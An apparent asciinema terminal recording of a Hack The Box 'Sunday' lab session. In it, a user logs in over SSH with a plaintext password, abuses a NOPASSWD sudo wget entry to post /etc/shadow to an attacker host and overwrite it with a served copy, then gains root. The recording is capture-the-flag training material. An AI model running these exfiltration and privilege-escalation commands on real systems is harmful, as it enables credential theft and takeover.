[80.831504, "o", "\u001b[91;1H10.10.10.76 - - [03/Sep/2022 20:21:13] \"GET /shadow HTTP/1.1\" 200 -\u001b[16;41H"]
[80.873764, "o", "200 OK\r\nLength: "]
[80.875228, "o", "770 [application/octet-stream]\r\nSaving to: '/etc/shadow'\r\n"]
[80.878006, "o", "\r\n"]
[80.879688, "o", "/etc/shadow                                                100%[========================================================================================================================================>]     770  --.-KB/s    in 0s      \u001b[22;1H2022-09-03 12:21:18 (50.0 MB/s) - '/etc/shadow' saved [770/770]\u001b[24;1H"]
[80.882939, "o", "-bash-4.4$ "]
[85.611228, "o", "\u001b[?25l\u001b[50;1H───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[92;1H"]
[85.611685, "o", "\u001b[?25l\u001b[42A───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[shadow] \u001b[4m0:python3*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                    20:21\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b["]
[85.611771, "o", "92;1H"]
[86.706185, "o", "^C"]
[86.706423, "o", "\r\nKeyboard interrupt received, exiting.\r\n"]
[86.71693, "o", "\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[?2004h"]
[86.879129, "o", "\u001b[51;99r\u001b[1;1H\u001b[52;99r\u001b[48S\u001b[51;1H\u001b[K\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[1;100r\u001b[52;5H"]
[89.773397, "o", "\u001b[?25l\u001b[50;1H───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[shadow] \u001b[4m0:bash*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                       20:21\u001b(B\u001b[m\u001b[?12l\u001b[?25h"]
[89.773468, "o", "\u001b[52;5H"]
[90.26683, "o", "\u001b[7msshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b(B\u001b[m"]
[90.824661, "o", "\u001b[?25l\u001b[50;1H───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[94m\u001b[1;1H┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m sshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b[K\r\nLast login: Sat Sep  3 12:19:54 2022 from 10.10.14.31\u001b[K\r\nOracle Corporation      SunO"]
[90.825019, "o", "S 5.11      11.4    Aug 2018\u001b[K\r\n-bash-4.4$ sudo -l\u001b[K\r\nUser sammy may run the following commands on sunday:\u001b[K\r\n    (ALL) ALL\u001b[K\r\n    (root) NOPASSWD: /usr/bin/wget\u001b[K\r\n-bash-4.4$ sudo /usr/bin/wget --post-file=/etc/shadow 10.10.14.31:4444\u001b[K\r\n--2022-09-03 12:20:20--  http://10.10.14.31:4444/\u001b[K\r\nConnecting to 10.10.14.31:4444... connected.\u001b[K\r\nHTTP request sent, awaiting response... ^C\u001b[K\r\n-bash-4.4$ sudo /usr/bin/wget http://10.10.14.31/shadow -O /etc/shadow\u001b[K\r\n--2022-09-03 12:21:18--  http://10.10.14.31/shadow\u001b[K\r\nConnecting to 10.10.14.31:80... connected.\u001b[K\r\nHTTP request sent, awaiting response... 200 OK\u001b[K\r\nLength: 770 [application/octet-stream]\u001b[K\r\nSaving to: '/etc/shadow'\u001b[K\r\n\u001b[K\r\n/etc/shadow                                                100%[========================================================================================================================================>]     770  --.-KB/s    in 0s      \u001b[K\r\n\u001b[K\r\n2022-09-03 12:21:18 (50.0 MB/s) - '/etc/shadow' saved [770/770]\u001b[K\r\n\u001b[K\r\n-bash-"]
[90.825135, "o", "4.4$ \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[94m\u001b[2B┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[7msshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[shadow] \u001b[4m0:bash*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                       20:21\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[52;57H"]
[91.035215, "o", "\u001b[?25l\u001b[50;1H───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[94m\u001b[1;1H┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m sshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b[K\r\nLast login: Sat Sep  3 12:19:54 2022 from 10.10.14.31\u001b[K\r\nOracle Corporation      SunO"]
[91.036, "o", "S 5.11      11.4    Aug 2018\u001b[K\r\n-bash-4.4$ sudo -l\u001b[K\r\nUser sammy may run the following commands on sunday:\u001b[K\r\n    (ALL) ALL\u001b[K\r\n    (root) NOPASSWD: /usr/bin/wget\u001b[K\r\n-bash-4.4$ sudo /usr/bin/wget --post-file=/etc/shadow 10.10.14.31:4444\u001b[K\r\n--2022-09-03 12:20:20--  http://10.10.14.31:4444/\u001b[K\r\nConnecting to 10.10.14.31:4444... connected.\u001b[K\r\nHTTP request sent, awaiting response... ^C\u001b[K\r\n-bash-4.4$ sudo /usr/bin/wget http://10.10.14.31/shadow -O /etc/shadow\u001b[K\r\n--2022-09-03 12:21:18--  http://10.10.14.31/shadow\u001b[K\r\nConnecting to 10.10.14.31:80... connected.\u001b[K\r\nHTTP request sent, awaiting response... 200 OK\u001b[K\r\nLength: 770 [application/octet-stream]\u001b[K\r\nSaving to: '/etc/shadow'\u001b[K\r\n\u001b[K\r\n/etc/shadow                                                100%[========================================================================================================================================>]     770  --.-KB/s    in 0s      \u001b[K\r\n\u001b[K\r\n2022-09-03 12:21:18 (50.0 MB/s) - '/etc/shadow' saved [770/770]\u001b[K\r\n\u001b[K\r\n-bash-"]
[91.03603, "o", "4.4$ \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[94m\u001b[2B┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[7msshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[shadow] \u001b[4m0:bash*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                       20:21\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[52;57H"]
[91.548558, "o", "\u001b[5Gsshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\b"]
[91.959291, "o", "\b"]
[92.460311, "o", "\b"]
[92.511478, "o", "\b"]
[92.561453, "o", "\b"]
[92.611703, "o", "\b"]
[92.661652, "o", "\b"]
[92.71237, "o", "\b"]
[92.762994, "o", "\b"]
[92.812356, "o", "\b"]
[92.863163, "o", "\b"]
[92.91482, "o", "\b"]
[92.965375, "o", "\b"]
[93.016823, "o", "\b"]
[93.066727, "o", "\b"]
[93.117269, "o", "\b"]
[93.168196, "o", "\b"]
[93.219754, "o", "\b"]
[93.269789, "o", "\b"]
[93.505988, "o", "\b"]
[93.952314, "o", "\b\u001b[1P"]
[94.091207, "o", "\b\u001b[1P"]
[94.222061, "o", "\b\u001b[1P"]
[94.363235, "o", "\b\u001b[1P"]
[94.510405, "o", "\b\u001b[1P"]
[94.849628, "o", "\u001b[1@r"]
[94.96716, "o", "\u001b[1@o"]
[95.135957, "o", "\u001b[1@o"]
[95.252553, "o", "\u001b[1@t"]
[95.391397, "o", "\r\n\u001b[?2004l"]
[96.343764, "o", "Last login: Sun Dec 19 10:30:35 2021 on console\r\nNOTE: system has 3 active alerts; run 'fmadm list' for details.\r\n"]
[96.34431, "o", "\u001b[?25l\u001b[5A───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[shadow] \u001b[4m0:sshpass*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                    20:21\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[5"]
[96.34436, "o", "5;1HOracle Corporation      SunOS 5.11      11.4    Aug 2018\r\n"]
[96.350673, "o", "root@sunday:~# "]
[96.942095, "o", "i"]
[97.076442, "o", "d"]
[97.185801, "o", ";"]
[97.325875, "o", "w"]
[97.429557, "o", "h"]
[97.519547, "o", "o"]
[97.532454, "o", "p"]
[97.594667, "o", "a"]
[97.696702, "o", "m"]
[97.797141, "o", "i"]
[98.1935, "o", "\b \b"]
[98.332436, "o", "\b \b"]
[98.497285, "o", "\b \b"]
[98.665112, "o", "\b \b"]
[98.824669, "o", "a"]
[98.912486, "o", "m"]
[99.09716, "o", "i"]
[99.455266, "o", "\r\n"]
[99.459667, "o", "uid=0(root) gid=0(root)\r\n"]
[99.463183, "o", "root\r\n"]
[99.463631, "o", "root@sunday:~# "]
[103.602756, "o", "\u001b[1;100r\u001b(B\u001b[m\u001b[?1l\u001b>\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l\u001b[?1005l\u001b[?7727l\u001b[?1004l\u001b[?1049l\u001b[23;0;0t"]
[103.603, "o", "[detached (from session shadow)]\r\n"]
[103.603488, "o", "\u001b[?2004h\u001b]0;root@kali: ~/htb/sunday/10.10.10.76/loot/loot\u0007\u001b[;94m┌──(\u001b[1;31mroot💀kali\u001b[;94m)-[\u001b[0;1m~/htb/sunday/10.10.10.76/loot/loot\u001b[;94m]\r\r\n\u001b[;94m└─\u001b[1;31m#\u001b[0m "]
[105.3536, "o", "\u001b[?2004l\r\r\nexit\r\n"]
